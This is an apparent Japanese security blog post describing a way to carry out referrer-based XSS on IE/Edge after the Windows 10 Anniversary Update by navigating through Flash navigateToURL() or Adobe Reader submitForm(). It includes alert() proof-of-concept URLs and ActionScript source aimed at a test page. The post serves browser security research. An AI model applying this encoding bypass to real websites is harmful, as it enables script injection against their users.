今日はXSSのテクニックを紹介する簡単なポストです!
Windows 10のAnniversary UpdateからIE/Edgeの細かい動作が変わっているようです。
XSSと関係の深い動作もいくつか変更されています。その中の1つに、リファラ文字列に含まれる一部の文字が常にエンコードされるようになった動作があります。以下に具体的に示します。
次のような、リファラ文字列を書き出すページがあるとします。
https://vulnerabledoma.in/xss_referrer
以前までのIE/Edgeでは、過去のブログでも取り上げたように、次のようにスクリプト文字列を含んだURLからのリファラを送信することで、XSSが可能でした。
https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>
ところがAnniversary Updateを適用したEdgeやIEで確認すると、
"<>
といったXSSのカギとなる文字列が次のようにエンコードされてしまいます。HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3Eこのせいで、単純に書き出すようなケースでXSSができなくなってしまいました。
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
今のところ、現役のWindows 8.1や7のIE11はリファラ文字列をエンコードしないので、XSSが可能なことの証明には困らないのですが、やっぱりWin10でもリファラでXSSしたいですよね!
今日は、そんな人達に朗報です。
Win10でリファラ経由でXSSする方法を発見したので、ご紹介したいと思います。
説明は一言で終わります。Flashの
navigateToURL()
を使ってナビゲーションすればまだRefererヘッダに"<>
がエンコードされずに入ってくれます。以下にPoCを置きました。Anniversary Update適用済みのWin10のIE/Edgeでアクセスしてみてください。
https://l0.cm/xss_referrer.swf?<script>alert(1)</script>
ActionScriptのソースコードはこんなかんじです:
package {ただ、残念ながら、アクセスしてわかる通り、この方法でうまくいくのは Refererリクエストヘッダを書き出す場合のみで、JavaScriptの
import flash.display.Sprite;
import flash.net.URLRequest;
import flash.net.navigateToURL;
public class xss_referrer extends Sprite{
public function xss_referrer() {
var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
navigateToURL(url, "_self");
}
}
}
document.referrer
プロパティはFlash経由のナビゲーションの場合はなぜか空になってしまうようです。残念。ちなみに、Adobe Readerの submitForm() というJavaScript API経由でもRefererリクエストヘッダにタグ文字を含めることができました。
以下にPoCがあります。Adobe ReaderプラグインがインストールされたWin10のIE11で動作を確認済みです。
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>
どうも、プラグイン経由のリクエストが考慮されていないみたいですね。
以上、Anniversary Update以後でも使えるReferrer文字列のXSS手法の紹介でした!
今月はもう1つか2つブログを書くつもりです。